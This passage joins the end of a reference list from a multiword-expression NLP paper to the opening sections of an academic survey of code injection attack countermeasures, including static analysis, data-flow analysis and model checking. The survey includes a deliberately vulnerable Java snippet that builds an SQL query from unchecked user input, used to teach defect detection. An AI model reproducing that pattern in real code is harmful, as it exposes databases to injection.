World, pages 49–56. Portland, Oregon, USA. Matthieu Constant, Anthony Sigogne, and Patrick Watrin. 2012. Discriminative strategies to integrate multiword expression recognition and parsing. In Proc. of ACL, pages 204–212. Jeju Island, Korea. Paul Cook, Afsaneh Fazly, and Suzanne Stevenson. 2008. The VNC-Tokens dataset. In Proc. of MWE, pages 19–22. Marrakech, Morocco. Hal Daumé, III. 2006. Practical structured learning tech- niques for natural language processing. Ph.D. disserta- tion, University of Southern California, Los Angeles, California, USA. URL http://hal3.name/docs/ daume06thesis.pdf. Mona Diab and Pravin Bhutada. 2009. Verb noun con- struction MWE token classification. In Proc. of MWE, pages 17–22. Suntec, Singapore. Nick C. Ellis, Rita Simpson-Vlach, and Carson Maynard. 2008. Formulaic language in native and second lan- guage speakers: psycholinguistics, corpus linguistics, and TESOL. TESOL Quarterly, 42(3):375–396. Christiane Fellbaum, editor. 1998. WordNet: an elec- tronic lexical database. MIT Press, Cambridge, Mas- sachusetts, USA. Charles J. Fillmore, Paul Kay, and Mary Catherine O’Connor. 1988. Regularity and idiomaticity in gram- matical constructions: the case of ‘let alone’. Language, 64(3):501–538. Yoav Freund and Robert E. Schapire. 1999. Large margin classification using the perceptron algorithm. Machine Learning, 37(3):277–296. Mahmoud Ghoneim and Mona Diab. 2013. Multiword expressions in the context of statistical machine trans- 204 lation. In Proc. of IJCNLP, pages 1181–1187. Nagoya, Japan. Kevin Gimpel and Noah A. Smith. 2011. Generative models of monolingual and bilingual gappy patterns. In Proc. of WMT, pages 512–522. Edinburgh, Scotland, UK. Adele E. Goldberg. 1995. Constructions: a construction grammar approach to argument structure. University of Chicago Press, Chicago, Illinois, USA. Adele E. Goldberg. 2006. Constructions at work: the nature of generalization in language. Oxford University Press, Oxford, UK. Edouard Grave, Guillaume Obozinski, and Francis Bach. 2013. Hidden Markov tree models for semantic class induction. In Proc. of CoNLL, pages 94–103. Sofia, Bulgaria. Spence Green, Marie-Catherine de Marneffe, John Bauer, and Christopher D. Manning. 2011. Multiword expres- sion identification with tree substitution grammars: a parsing tour de force with French. In Proc. of EMNLP, pages 725–735. Edinburgh, Scotland, UK. Spence Green, Marie-Catherine de Marneffe, and Christo- pher D. Manning. 2012. Parsing models for identify- ing multiword expressions. Computational Linguistics, 39(1):195–227. Jan Hajič, Eva Hajičová, Jarmila Panevová, Petr Sgall, Silvie Cinková, Eva Fučíková, Marie Mikulová, Petr Pajas, Jan Popelka, Jiří Semecký, Jana Šindlerová, Jan Štěpánek, Josef Toman, Zdeňka Urešová, and Zdeněk Žabokrtský. 2012. Prague Czech-English Dependency Treebank 2.0. Technical Report LDC2012T08, Linguis- tic Data Consortium, Philadelphia, Pennsylvania, USA. URL http://www.ldc.upenn.edu/Catalog/ catalogEntry.jsp?catalogId=LDC2003T10. Silvana Hartmann, György Szarvas, and Iryna Gurevych. 2012. Mining multiword terms from Wikipedia. In Maria Teresa Pazienza and Armando Stellato, editors, Semi-Automatic Ontology Development. IGI Global, Hershey, Pennsylvania, USA. Chikara Hashimoto and Daisuke Kawahara. 2008. Con- struction of an idiom corpus and its application to id- iom identification based on WSD incorporating idiom- specific features. In Proc. of EMNLP, pages 992–1001. Honolulu, Hawaii, USA. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple semi-supervised dependency parsing. In Proc. of ACL-08: HLT, pages 595–603. Columbus, Ohio. Koenraad Kuiper, Heather McCann, Heidi Quinn, Therese Aitchison, and Kees van der Veer. 2003. SAID. Technical Report LDC2003T10, Linguistic Data Consortium, Philadelphia, Pennsylvania, USA. URL http://www.ldc.upenn.edu/Catalog/ catalogEntry.jsp?catalogId=LDC2003T10. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional random fields: probabilistic models for segmenting and labeling sequence data. In Proc. of ICML, pages 282–289. Percy Liang. 2005. Semi-supervised learning for nat- ural language. Master’s thesis, Massachusetts In- stitute of Technology, Cambridge, Massachusetts, USA. URL http://people.csail.mit.edu/ pliang/papers/meng-thesis.pdf. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: the Penn Treebank. Computational Linguistics, 19(2):313–330. I. Dan Melamed. 1997. Automatic discovery of non- compositional compounds in parallel data. In Proc. of EMNLP, pages 97–108. Providence, Rhode Island, USA. George A. Miller, Claudia Leacock, Randee Tengi, and Ross T. Bunker. 1993. A semantic concordance. In Proc. of HLT, pages 303–308. Plainsboro, New Jersey, USA. Scott Miller, Jethran Guinness, and Alex Zamanian. 2004. Name tagging with word clusters and discriminative training. In Proc. of HLT-NAACL, pages 337–342. Boston, Massachusetts, USA. Behrang Mohit, Nathan Schneider, Rishav Bhowmick, Ke- mal Oflazer, and Noah A. Smith. 2012. Recall-oriented learning of named entities in Arabic Wikipedia. In Proc. of EACL, pages 162–173. Avignon, France. Begona Villada Moirón and Jörg Tiedemann. 2006. Iden- tifying idiomatic expressions using automatic word- alignment. In Proc. of the EACL 2006 Workshop on Multi-word Expressions in a Multilingual Context, pages 33–40. Trento, Italy. Rosamund Moon. 1998. Fixed expressions and idioms in English: a corpus-based approach. Oxford Stud- ies in Lexicography and Lexicology. Clarendon Press, Oxford, UK. David Newman, Nagendra Koilada, Jey Han Lau, and Timothy Baldwin. 2012. Bayesian text segmentation for index term identification and keyphrase extraction. In Proc. of COLING 2012, pages 2077–2092. Mumbai, India. Geoffrey Nunberg, Ivan A. Sag, and Thomas Wasow. 1994. Idioms. Language, 70(3):491–538. Olutobi Owoputi, Brendan O’Connor, Chris Dyer, Kevin Gimpel, Nathan Schneider, and Noah A. Smith. 2013. Improved part-of-speech tagging for online conversa- tional text with word clusters. In Proc. of NAACL-HLT, pages 380–390. Atlanta, Georgia, USA. Gerhard Paaß and Frank Reichartz. 2009. Exploiting 205 semantic constraints for estimating supersenses with CRFs. In Proc. of the Ninth SIAM International Confer- ence on Data Mining, pages 485–496. Sparks, Nevada, USA. Pavel Pecina. 2010. Lexical association measures and collocation extraction. Language Resources and Evalu- ation, 44(1):137–158. Carlos Ramisch. 2012. A generic and open framework for multiword expressions treatment: from acquisition to applications. Ph.D. disser- tation, University of Grenoble and Federal Uni- versity of Rio Grande do Sul, Grenoble, France. URL http://www.inf.ufrgs.br/~ceramisch/ download_files/thesis-getalp.pdf. Carlos Ramisch, Vitor De Araujo, and Aline Villavicencio. 2012. A broad evaluation of techniques for automatic acquisition of multiword expressions. In Proc. of ACL 2012 Student Research Workshop, pages 1–6. Jeju Is- land, Korea. Carlos Ramisch, Aline Villavicencio, and Christian Boitet. 2010. mwetoolkit: a framework for multiword expres- sion identification. In Proc. of LREC, pages 662–669. Valletta, Malta. Lance A. Ramshaw and Mitchell P. Marcus. 1995. Text chunking using transformation-based learning. In Proc. of the Third ACL Workshop on Very Large Corpora, pages 82–94. Cambridge, Massachusetts, USA. Lev Ratinov and Dan Roth. 2009. Design challenges and misconceptions in named entity recognition. In Proc. of CoNLL, pages 147–155. Boulder, Colorado, USA. Marta Recasens and Eduard Hovy. 2011. BLANC: Im- plementing the Rand index for coreference evaluation. Natural Language Engineering, 17(04):485–510. Alan Ritter, Sam Clark, Mausam, and Oren Etzioni. 2011. Named entity recognition in tweets: an experimental study. In Proc. of EMNLP, pages 1524–1534. Edin- burgh, Scotland, UK. Ivan Sag, Timothy Baldwin, Francis Bond, Ann Copes- take, and Dan Flickinger. 2002. Multiword expressions: a pain in the neck for NLP. In Alexander Gelbukh, editor, Computational Linguistics and Intelligent Text Processing, volume 2276 of Lecture Notes in Computer Science, pages 189–206. Springer, Berlin, Germany. Nathan Schneider, Spencer Onuffer, Nora Kazour, Emily Danchik, Michael T. Mordowanec, Henrietta Conrad, and Noah A. Smith. 2014. Comprehensive annotation of multiword expressions in a social web corpus. In Proc. of LREC. Reykjavík, Iceland. Yutaro Shigeto, Ai Azuma, Sorami Hisamoto, Shuhei Kondo, Tomoya Kouse, Keisuke Sakaguchi, Akifumi Yoshimoto, Frances Yung, and Yuji Matsumoto. 2013. Construction of English MWE dictionary and its appli- cation to POS tagging. In Proc. of the 9th Workshop on Multiword Expressions, pages 139–144. Atlanta, Georgia, USA. James W. Thatcher. 1967. Characterizing derivation trees of context-free grammars through a generalization of finite automata theory. Journal of Computer and System Sciences, 1(4):317–322. Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic dependency network. In Proc. of HLT-NAACL, pages 173–180. Edmonton, Alberta, Canada. Yulia Tsvetkov and Shuly Wintner. 2010. Extraction of multi-word expressions from small parallel corpora. In Coling 2010: Posters, pages 1256–1264. Beijing, China. Yulia Tsvetkov and Shuly Wintner. 2011. Identification of multi-word expressions by combining multiple lin- guistic information sources. In Proc. of EMNLP, pages 836–845. Edinburgh, Scotland, UK. Yuancheng Tu and Dan Roth. 2011. Learning English light verb constructions: contextual or statistical. In Proc. of the Workshop on Multiword Expressions: from Parsing and Generation to the Real World, pages 31–39. Portland, Oregon, USA. Yuancheng Tu and Dan Roth. 2012. Sorting out the most confusing English phrasal verbs. In Proc. of *SEM, pages 65–69. Montréal, Quebec, Canada. Joseph Turian, Lev-Arie Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proc. of ACL, pages 384–394. Uppsala, Sweden. Martin Čmejrek, Jan Cuřín, Jan Hajič, and Jiří Havelka. 2005. Prague Czech-English Dependency Treebank: resource for structure-based MT. In Proc. of EAMT, pages 73–78. Budapest, Hungary. Marc Vilain, John Burger, John Aberdeen, Dennis Con- nolly, and Lynette Hirschman. 1995. A model-theoretic coreference scoring scheme. In Proc. of MUC-6, pages 45–52. Columbia, Maryland, USA. Veronika Vincze. 2012. Light verb constructions in the SzegedParalellFX English-Hungarian parallel corpus. In Proc. of LREC. Istanbul, Turkey. Veronika Vincze, István Nagy T., and János Zsibrita. 2013. Learning to detect English and Hungarian light verb constructions. ACM Transactions on Speech and Lan- guage Processing, 10(2):6:1–6:25. 206 work_ztwbqgudijgzxlxrphrkhfclui ---- Submitted 31 January 2017 Accepted 3 October 2017 Published 27 November 2017 Corresponding author Dimitris Mitropoulos, dimitro@aueb.gr Academic editor Cynthia Irvine Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.136 Copyright 2017 Mitropoulos and Spinellis Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Fatal injection: a survey of modern code injection attack countermeasures Dimitris Mitropoulos and Diomidis Spinellis Department of Management Science and Technology, Athens University of Economics and Business, Greece ABSTRACT With a code injection attack (CIA) an attacker can introduce malicious code into a computer program or system that fails to properly encode data that comes from an untrusted source. A CIA can have different forms depending on the execution context of the application and the location of the programming flaw that leads to the attack. Currently, CIAs are considered one of the most damaging classes of application attacks since they can severely affect an organisation’s infrastructure and cause financial and reputational damage to it. In this paper we examine and categorize the countermeasures developed to detect the various attack forms. In particular, we identify two distinct categories. The first incorporates static program analysis tools used to eliminate flaws that can lead to such attacks during the development of the system. The second involves the use of dynamic detection safeguards that prevent code injection attacks while the system is in production mode. Our analysis is based on nonfunctional characteristics that are considered critical when creating security mechanisms. Such characteristics involve usability, overhead, implementation dependencies, false positives and false negatives. Our categorization and analysis can help both researchers and practitioners either to develop novel approaches, or use the appropriate mechanisms according to their needs. Subjects Security and Privacy Keywords Application security, Code injection attacks, Countermeasures, Static analysis, Dynamic prevention, Software vulnerabilities, Cross-site scripting INTRODUCTION AND COVERED AREA Security vulnerabilities derive from a small number of programming flaws that lead to security breaches (Wurster & Van Oorschot, 2008; Viega & McGraw, 2001). One common mistake that developers make concerns user input, assuming, for example, that only word characters will be entered by the user, or that the user input will never exceed a certain length (Mitropoulos et al., 2011). Developers may assume, correctly, that a high-level language in an application will protect them against threats like buffer overflows (Keromytis, 2011). Developers may also assume, incorrectly, that user input is not a security issue any more. Such an assumpion can lead to the processing of invalid data that an attacker can introduce into a program and cause it to execute malicious code. This kind of exploit is known as a code injection attack (CIA) (Ray & Ligatti, 2012; Mitropoulos et al., 2011). Code injection attacks have been topping the vulnerability lists of numerous bulletin providers for several years. (http://www.sans.org/top-cyber-security-risks/, http://cwe.mitre.org/top25/) Consider the Open Web Application Security Project How to cite this article Mitropoulos and Spinellis (2017), Fatal injection: a survey of modern code injection attack countermeasures. PeerJ Comput. Sci. 3:e136; DOI 10.7717/peerj-cs.136 https://peerj.com mailto:dimitro@aueb.gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.136 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://www.sans.org/top-cyber-security-risks/ http://cwe.mitre.org/top25/ http://dx.doi.org/10.7717/peerj-cs.136 (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) (OWASP) Top Ten project which represents a broad consensus about what the most critical web application security flaws are, and is referenced by Payment Card Industry Security Standards Council (https://www.pcisecuritystandards.org/security_standards/) (PCI DSS), Defense Information Systems Agency (www.disa.mil/) (DISA) and numerous researchers. In its three consecutive Top Ten lists (2007, 2010, 2013), different classes of code injection are included in the top five positions. Over several years of efforts, a large body of knowledge has been assembled regarding code injection attacks consisting of countermeasures, novel ways of attacking, and others. In this paper we first identify the basic categories of CIAs (‘Code Injection Attacks’). Then, we analyze the basic approaches used to counter such attacks, and the mechanisms that implement them (‘Countermeasures’). Specifically, there are two categories of countermeasures that can be used by developers to: (a) identify and eliminate the vulnerabilities that the system contains during the development process, (b) guard the system against code injection attacks while it is in production mode. Then, we highlight the positive and negative aspects of each countermeasure and finally we evaluate them based on the following requirements (see ‘Analysis and Discussion’): • Flexibility: We check if an approach can be adjusted in order to detect different code injection attack categories. • Effectiveness Tests: As long as we examine security mechanisms that detect either attacks or defects, we want to see if researchers have measured the effectiveness of their proposed mechanisms in terms of false positive and negative rates. • Implementation independence: We check if the mechanisms depend either on the characteristics of the programming language that was used to develop them or on the implementation details of the protecting entity. • Computational Overhead: Finally, we examine if a mechanisms imposes a cost due to its use, as it may introduce an amount of extra computation on an application. All the aforementioned requirements are considered critical when building security mechanisms (Anderson, 2001; Romero-Mariona et al., 2009; Mellado, Fernández-Medina & Piattini, 2010; Halfond, Viegas & Orso, 2006). Finally, we discuss some emerging challenges for future research on the field (‘Emerging Challenges’), and provide some general observations together with some concluding remarks (‘Conclusions’). There is already a survey on mitigating software vulnerabilities in general (Shahriar & Zulkernine, 2012). The scope of that research is very broad and leaves out many approaches and mechanisms that we report here. Also, countermeasures that prevent two subcategories, namely: binary code injection (Younan, Joosen & Piessens, 2012) and SQL injection (Halfond, Viegas & Orso, 2006) in particular, have already been surveyed. The body of work done on the field though, exceeds the boundaries of this research too. Furthermore, in the latter case (Halfond, Viegas & Orso, 2006), the survey is quite old and since then the number of countermeasures that detect SQL injection attacks alone, has doubled. Finally, the authors of this survey do not take false positives and false negatives into account in their research. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 2/40 https://peerj.com https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project https://www.pcisecuritystandards.org/security_standards/ www.disa.mil/ http://dx.doi.org/10.7717/peerj-cs.136 CODE INJECTION ATTACKS Code injection is a technique to introduce malicious code into a computer program by taking advantage of unchecked or wrong assumptions the program makes about its inputs (Mitropoulos et al., 2011). Bratus et al. (2011) portray the issue in a generic fashion: ‘‘unexpected (and unexpectedly powerful) computational models inside targeted systems, which turn a part of the target into a so-called ‘‘weird machine’’ programmable by the attacker via crafted inputs (a.k.a. ‘‘exploits’’)’’. An example of the above definition is the following: The code fragment below, defines the operation of addition in the Scheme programming language (Abelson & Sussman, 1996; Dybvig, 2009): ( d e f i n e ( add x y ) (+ x y ) ) Consider the case where instead of a number, a function that leads to an endless loop is passed as an argument by the user. This will cause the interpreter to enter an endless loop and lead to a denial of service. The intuition here is that ‘‘every application that copies untrusted input verbatim into an output program is vulnerable to code injection attacks’’. Ray & Ligatti (2012) actually proved the above claim based on formal language theory. Code injection attacks are one of the most critical class of attacks (Francillon & Castelluccia, 2008; Su & Wassermann, 2006; Baca, Carlsson & Lundberg, 2008) due to the following reasons: • They can occur in different layers, such as databases, libraries, native code and the browser. • They span a wide range of security issues, such as viewing sensitive information, editing of personal data, or even stopping the execution of a system. Figure 1 presents a categorization of CIAs divided into two categories. The first involves binary codeand the second sourcecode. Weillustrate the attack categoriesand subcategories that have been analyzed in other research papers, in grey color. JavaScript injection has lately become a prominent subcategory, hence we provide some basic examples in Appendix. Binary Code Injection Attacks: Such attacks involve the insertion of binary code into an application to alter its execution flow and execute malicious compiled code. This category involves buffer-overflow attacks (Cowan et al., 1998; Keromytis, 2011; Szekeres et al., 2013), a staple of security problems. These attacks may occur when the bounds of memory areas are not checked, and access beyond these bounds is possible by the program. Based on this, malicious users can inject additional data overwriting the existing data of adjacent memory. From there they can take control over a program or crash it. Another attack vector involves format string vulnerabilities. The basis of this defect is the unexpected behaviour of functions with variable arguments. Typically, a function that handles a number of arguments has to read them from the stack. If we specify a format string that will make printf expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. If attackers have control over the format string, then they could eiter read from or write to arbitrary memory addresses. C and C++ Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 3/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Code Injection Attacks Binary Code Attacks Dynamic Language Attacks Domain-Specific Language Attacks PHP Attacks Javascript Attacks [...] SQL Attacks XPath Attacks [...] Stack Smashing Attacks Heap Smashing Attacks [...] Source Code Attacks Figure 1 A categorization of code injection attacks. The subcategories that have been extensively ana- lyzed in other research papers (Lhee & Chapin, 2003; Pincus & Baker, 2004) can be seen in grey colour. Full-size DOI: 10.7717/peerjcs.136/fig-1 are two programming languages vulnerable to this kind of attacks since corresponding implementations lack a protection scheme against overwriting data in any part of the memory (Mitropoulos et al., 2011). There are two research papers that present various techniques that belong to this category. In particular, an extensive survey on binary code injection attacks can be found in reference (Lhee & Chapin, 2003). Furthermore, specific advances in exploiting such vulnerabilities (i.e., heap smashing, arc injection and others) have been presented in reference (Pincus & Baker, 2004). Finally, the countermeasures used to detect such defects have already been surveyed (Younan, Joosen & Piessens, 2012) (many of them are also included in a book: Das, Kant & Zhang, 2012—Section 13.8). Nevertheless, we include some of them in this survey because they prompted the development of some sophisticated countermeasures. Source Code Injection Attacks: Code injection also includes the use of source code, either of a Domain Specific Language (DSL) or a Dynamic Language. Note that binary code injection attacks can only occur when the target system is implemented in languages lacking array bounds checking, like C and C++. Contrariwise, source code-driven injection attacks can target applications written in various programming languages with different features and characteristics. Code injection attacks that involve DSLs are critical, as DSLs like SQL and XML play an important role in the development of web applications. For instance, many web applications have interfaces through which web users enter input to interact with the application’s data. In this way, they interact with the underlying RDBMS (Relational Database Management System). Typically, this input can become part of an SQL statement and then gets executed on the corresponding RDBMS. An attack that exploits the defects of these interfaces by taking advantage of input validation issues (e.g., inefficient type handling), is called an ‘‘SQL injection attack’’ (CERT, 2002; Mitropoulos & Spinellis, 2009). The various techniques used Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 4/40 https://peerj.com https://doi.org/10.7717/peerjcs.136/fig-1 http://dx.doi.org/10.7717/peerj-cs.136 Code injection Attack Countermeasures Static Analysis Dynamic Detection Simple Pattern Matching Lexical Analysis Data-Flow Analysis Model Checking Type System Extensions Symbolic Execution Instruction Set Randomization Policy Enforcement Whitelisting Runtime Tainting Figure 2 The basic categories of code injection attack countermeasures. Full-size DOI: 10.7717/peerjcs.136/fig-2 to perform such attacks have can be found in reference (Halfond, Viegas & Orso, 2006). Instructive examples can be also found in reference (Su & Wassermann, 2006). By using very similar techniques to the ones presented in the aforementioned references, attackers can perform other exploits based on DSLs, like XML (Mattos, Santin & Malucelli, 2013) and XPath (Su & Wassermann, 2006; Cannings, Dwivedi & Lackey, 2007; Mitropoulos, Karakoidas & Spinellis, 2009). A critical class of code injection attacks involve dynamic languages such as Python, Perl, JavaScript, and PHP (Seixas et al., 2009; Egele et al., 2009; Son, McKinley & Shmatikov, 2013). In particular, JavaScript injection attacks comprise a wide subset of dynamic language-driven attacks. Such attacks are manifested when an application accepts and redisplays data of unknown origin without appropriate validation and filtering. Based on this vulnerability, a malicious user can manage to inject a script in the JavaScript engine of a browser and alter its execution flow (Erlingsson, Livshits & Xie, 2007). JavaScript injection attacks are considered as a crucial issue in application security because they are associated with major vulnerabilities such as: XSS attacks (Sivakumar & Garg, 2007) and XCS (Cross-Channel Scripting) attacks (Wang, 2010; Bojinov, Bursztein & Boneh, 2009). As we mentioned earlier, typical examples of JavaScript injection attacks can be found on the Appendix of this paper—A. COUNTERMEASURES Two different basic methods are used to deal with the code injection problem (see Fig. 2): • Static Analysis involves the inspection of either source or binary code to find software bugs that could lead to a code injection attack without actually executing the program. • Dynamic Detection observes the behavior of a running system in order to detect and prevent a code injection attack. In the first case, programmers try to eliminate software vulnerabilities while applications are created (also known as the build-in security (McGraw, 2006) concept). The second concept involves the development of methods and tools that secure systems after their Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 5/40 https://peerj.com https://doi.org/10.7717/peerjcs.136/fig-2 http://dx.doi.org/10.7717/peerj-cs.136 deployment. There are numerous approaches that belong to each of these two basic methods and for each approach Fig. 2, provides the corresponding bibliography. Static analysis The main concept behind static analysis is to identify security vulnerabilities during the development process. Currently, there are many software development processes that include static analysis tools for security as their integral parts (Brown & Paller, 2008; Gregoire et al., 2007; Fagan, 1999). From the usage of utilities like grep to complex methods, static analysis has been an evolving approach to detect software vulnerabilities (Chess & West, 2007). Initially, the most straightforward approach is the adoption of secure coding practices (Howard & LeBlanc, 2003; Viega & McGraw, 2001; McGraw, 2006). For example, to prevent an SQL injection attack, developers can use specific features provided by the language they use (e.g., Java’s PreparedStatement object). Nevertheless, this does not usually happen, as developers may not be aware of them, or time schedules may be tight, encouraging sloppy practices instead. Simple pattern matching During a manual code review it is easy to look for functions associated with code injection defects. Using existing tools available in almost every operating system, security auditors can search through a set of files for an arbitrary text pattern. These patterns are commonly specified through a regular expression. Accompanied by a well organized list of patterns, the auditor can quickly identify locations at which a program might face security problems. If auditors choose to use utilities like grep and qgrep though, they must check for every vulnerability manually. Apart from this, they must have an expert knowledge because there are many different kinds of such defects. Furthermore, the analysis these utilities perform is naive. For example there is no distinction between a vulnerable function call, a comment, and an unrelated identifier. Hence, a higher prevalence of false positives should be expected (Chess & McGraw, 2004). Finally the output can be disorganized and overwhelming. The distinct disadvantages of pattern scanning and the continuous emergence of new defects were some of the main reasons that led to more sophisticated approaches. Lexical analysis Lexical analysis is one of the first approaches used for detecting security defects. This is because it is simple and easy to use. Lexical analysis is based upon formal language theory and finite state automata (Aho et al., 2006). As a term, it is mostly used to describe the first phase of the compilation process. However, there is no difference between this phase and the method that we describe here (McGraw, 2008). The two differ only in the manipulation of their outcome. There are three phases that can be distinguished here, namely: scanning, tokenizing and matching (Kantorovitz, 2004). In the first two phases possible character sequences are recognized, classified and transformed into various tokens. Then the resulting sequences are associated with security vulnerabilities. Specifically, there are lists that contain entries of vulnerable constructs used during the matching phase. After a successful match an Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 6/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 alert message warns auditors, describing the vulnerability and providing them with alternative usages. The lexical analysis approach is implemented by security utilities such as BOON (Wagner et al., 2000), PScan (Johnson, 2006; Heffley & Meunier, 2004; Chen & Wagner, 2007), ITS4 (Viega et al., 2002; Viega et al., 2000; Wilander & Kamkar, 2002), Flawfinder (http://www.dwheeler.com/flawfinder/) (Wilander & Kamkar, 2002) and RATS (http: //www.security-database.com/toolswatch/RATS-v2-3-Rough-Auditing-Tool-for.html) (Kong et al., 2007; Chess & McGraw, 2004; Wilander & Kamkar, 2002). For the most part, these tools scan source code pointing out unsafe calls of string-handling functions that could lead to a CIA. Then, they provide a list of possible threats ranked by risk level. This level is usually specified by checking the arguments of such functions. The vulnerability lists are simply constructed making the addition, removal, and modification of an entry quite easy. All the aforementioned tools scan C and C++. This exclusiveness lies on the fact that C and its standard libraries are very susceptible to binary code injection attacks as we mentioned in ‘Code Injection Attacks’. Lexical analysis can be flexible, straightforward and extremely fast. With one or more non-processed files as input, and simple descriptions as output, developers can quickly check their code for vulnerabilities. Also they can easily update and edit their vulnerability library with new possible threats due to its simplistic nature. Although superior to manual pattern matching, this approach has no knowledge of the code’s semantics or how data circulates throughout a program. As a result there are several false positive and negative reports (Chess & West, 2007; Cowan, 2003). Note though, that lexical analysis utilities helped the gathering and depiction of a tentative set of security rules in one place for the first time (McGraw, 2008). Data-flow analysis Data-flow analysis is another compiler-associated approach used to discover software defects. It is more sophisticated and more appropriate for a comprehensive code review than lexical analysis. Data-flow analysis can be described as a process that gathers details that concern the definition and dependencies of data within a program without executing it (Moonen, 1997; Fosdick & Osterweil, 1976). In addition, data-flow analysis algorithms can document all sequences of specific types of events which might occur in a program execution. The key insight of this approach is a Control-Flow Graph (CFG). Based on the program’s CFG, this method examines how data moves throughout a program by representing all its possible execution paths (Chess & West, 2007; Cahoon & McKinley, 2001). By traversing the CFG of a program, data-flow analysis can determine where values are generated and where they are used. Hence this approach can be used to describe safety properties that are based on the flow of information (Abi-Antoun, Wang & Torr, 2007). As an example: it is very likely that the CFG of a program with an SQL injection defect, will include a data-flow path from an input function to a vulnerable operation. For instance, in the following code fragment, user input reaches a method that interacts with a database without any prior validation: Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 7/40 https://peerj.com http://www.dwheeler.com/flawfinder/ http://www.security-database.com/toolswatch/RATS-v2-3-Rough-Auditing-Tool-for.html http://www.security-database.com/toolswatch/RATS-v2-3-Rough-Auditing-Tool-for.html http://dx.doi.org/10.7717/peerj-cs.136 uName = r e q u e s t . getParameter ( " username " ) ; S t r i n g query = null ; i f (uName != null ) { query = " SELECT ∗"+ "FROM t a b l e WHERE uname = ’ "+uName+" ’ " ; r s = stmt . executeQuery ( query ) ; } e l s e { . . . } As a result, the danger of an SQL injection attack is prominent. As it is already clear from the aforementioned example, data-flow analysis is tailored to localize code injection vulnerabilities since it can be applied to associate the unchecked input with the execution of the query and issue a notification. This is why there are numerous adaptations that detect SQL injection defects, cross-site scripting vulnerabilities, buffer overflows and others. In addition, most of the creators of such frameworks, claim that with minor changes, their prototypes can be equally applied to also detect other kinds of such defects. Contrary to lexical analysis, to counter such anomalies, a data-flow analysis mechanism needs more than a vulnerability library that connects coding constructs with software defects. Furthermore, a rule-pack containing specific control flow rules and ad-hoc checkers that run upon the CFG are required. The most common rules used in this method, are the source, the pass-through and the sink rules (Chess & West, 2007). A source rule denotes the starting point of a possible hazard while a sink rule depicts the coding construct where the hazard takes place. In the aforementioned example, a source rule will apply for the first line where input can come from a malicious user. The sink rule on the other hand will refer to the fifth line where attacked-controlled data can reach the database. The pass rule indicates the code that exists between the above two and carries the possibly corrupted data. For the most part, these rules are maintained in external files that use a specific format to describe them. Livshits & Lam (2005) based their work in the functionality presented above to detect possible SQL and JavaScript injection defects in Java applications. Nagy & Mancoridis (2009) have proposed a number of checkers that locate buffer overflow and format string defects. The idea behind their proposal is to mark all the user-input-related parts of the source code. These checkers are implemented as plug-ins to the CodeSurfer (http://www.grammatech.com/research/technologies/codesurfer) tool (Anderson & Zarins, 2005), a commercial tool that performs data-flow analysis on C/C++ programs. Another two indicative tools used to detect injection anomalies are Pixy (Jovanovic, Kruegel & Kirda, 2006) and XSSdetect (https://blogs.msdn.microsoft.com/ace_team/2007/10/22/xssdetect- public-beta-now-available/). Both of these tools detect cross-site scripting vulnerabilities in web applications. The latter, released by Microsoft, runs as a Visual Studio plug-in and analyzes.NETIL(IntermediateLanguage)whichisread directlyfromthecompiledbinaries. Pixy on the other hand, is a standalone open source tool, that examines PHP scripts. In many cases, rules can appear directly in the code of the program in the form of annotations. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 8/40 https://peerj.com http://www.grammatech.com/research/technologies/codesurfer https://blogs.msdn.microsoft.com/ace_team/2007/10/22/xssdetect-public-beta-now-available/ https://blogs.msdn.microsoft.com/ace_team/2007/10/22/xssdetect-public-beta-now-available/ http://dx.doi.org/10.7717/peerj-cs.136 A tool that considers control flow graphs and uses annotations at the same time to find buffer overflows and memory leaks is Splint (Evans & Larochelle, 2002). FindBugs (Ayewah & Pugh, 2010; Hovemeyer & Pugh, 2007; Spacco, Hovemeyer & Pugh, 2006) is also a static analyzer based on data-flow analysis. Dahse & Holz (2014) have proposed a refined type of data-flow analysis to detect second-order vulnerabilities. Notably, such vulnerabilities occur when an attack payload is first stored by the application on the web server and then later on used in a security-critical operation. As a more sophisticated approach than lexical analysis, data-flow analysis exhibits fewer false positives and negatives than the former. For example, many buffer overflows are not exploitable because the attacker cannot handle the data that overflows the buffer. By using this method, an auditor can in fact distinguish exploitable from non-exploitable buffer overflows. The advantage of data flow static analysis is that it can identify vulnerabilities that could actually occur when real application paths are exercised and not just dangerous coding constructs. Model checking Model checking is a formal verification approach developed based on graph theory and finite state automata (Clarke, Emerson & Sifakis, 2009; Merz, 2001). A software model checking framework accepts a system’s source or binary code as input and checks automatically if it satisfies specific properties. First, the framework analyzes statically the code to extract a high-level representation of the system, namely a model. This model usually corresponds to a control-flow graph or a pushdown automaton (Beyer et al., 2007; Chen & Wagner, 2002). The properties are often expressed either as assertions, as formulas of temporal logic, or as finite state automata (Pnueli, 1977; Miller, Donaldson & Calder, 2006). By traversing every execution path of the model, the framework determines whether certain states represent a violation of the provided properties. There is a great number of dangerous programming practices that can be accurately modeled with equivalent security properties. For example, 